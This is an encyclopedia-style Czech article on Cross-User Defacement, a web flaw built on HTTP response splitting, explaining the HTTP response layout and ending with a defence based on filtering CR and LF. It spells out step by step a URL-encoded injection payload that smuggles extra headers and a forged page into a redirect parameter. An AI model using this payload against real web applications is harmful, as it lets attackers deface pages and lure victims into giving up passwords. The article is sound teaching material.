# Cross-User Defacement
Cross-User Defacement je v informatice druh zranitelnosti webové aplikace založený na technice HTTP response splitting. Cílem útočníka je nahradit odpověď od serveru podvrženým dokumentem.

## Popis zranitelnosti
Předpokladem k provedení Cross-User Defacement je aby aplikace byla zranitelná na HTTP response splitting tj. nesmí být filtrovány znaky CR a LF a musí docházet k přesměrování.
Pokud jsou tyto dvě podmínky splněny, tak je útočník schopen vytvořit podvržený HTTP požadavek tak, aby rozdělil odpověď od serveru na odpovědi dvě a to s tím, že obsah druhé odpovědi je zcela v jeho režii. Původní požadovaný dokument prohlížeč zahodí a je nahrazen podvrženým dokumentem. Samozřejmě je nutné dodržet strukturu HTTP odpovědi.
Takto upravená stránka může být dále zneužita například k vylákání soukromých informací či hesel.
K provedení útoku může útočník využít veřejně dostupný proxy server, který bude HTTP požadavky patřičně upravovat, nebo pomocí metod sociálního inženýrství přinutit oběť kliknout na upravený odkaz.

## Struktura HTTP odpovědi
Aby byl útok proveden, je nutné při upravování odpovědi zachovat její strukturu.
První obsaženou informací v odpovědi je verze použitého protokolu a stavový kód. 
```
HTTP/1.0 200 OK
```

Následují další, v tomto případě, ne moc zajímavé informace jako je datum, verze webového serveru, jazyk, etc. Pokud jsou vynechány, tak se nic neděje.
```
Date: Fri, 15 Oct 2004 08:20:25 GMT
Server: Apache/1.3.29 (Unix) PHP/4.3.8
X-Powered-By: PHP/4.3.8
Vary: Accept-Encoding,Cookie
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: cs
```

Hlavičky popisující typ dat v odpovědi a obsah.
```
Content-Type: text/html
Content-length: 47
-- prázdný řádek --
```

A za prázdným řádkem je umístěn samotný dokument.

## Útok na zranitelnou aplikaci
Identifikace parametru pro přesměrování.
Vložení nějaké hodnoty:
```
foo
```

Přechod na nový řádek pomocí znaků CR a LF:
```
%0d%0a
```

Nastavení Content-Length na nulu (Content-length: 0), kterou je nutné zakódovat jako URL do sekvence %200:
```
Content-length:%200
```

Vložení hlavičky další odpovědi (speciální znaky je nutné převést do URL kódování):
```
HTTP/1.1 200OK
Content-Type: text/html 
Content-length: 47
<html>Deface</html>
Odeslání dotazu.
```

Odesílaný dotaz by měl vypadat nějak takto:
```
foobar%0d%0aContent-length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-  
length:%2047%0d%0a%0d%0a<html>Deface</html>
```

## Obrana
Obranou před Cache poisoning je neumožnit útočníkovi provést HTTP Response Splitting, čehož lze dosáhnout odfiltrováním znaků CR a LF od všech uživatelských vstupů zejména tam, kde jsou hodnoty parametrů vkládány do hlaviček.